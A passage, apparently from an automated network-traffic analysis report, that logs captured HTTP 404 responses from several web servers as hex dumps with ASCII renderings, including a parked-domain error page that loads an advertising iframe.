73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:41 GMTAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:31 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 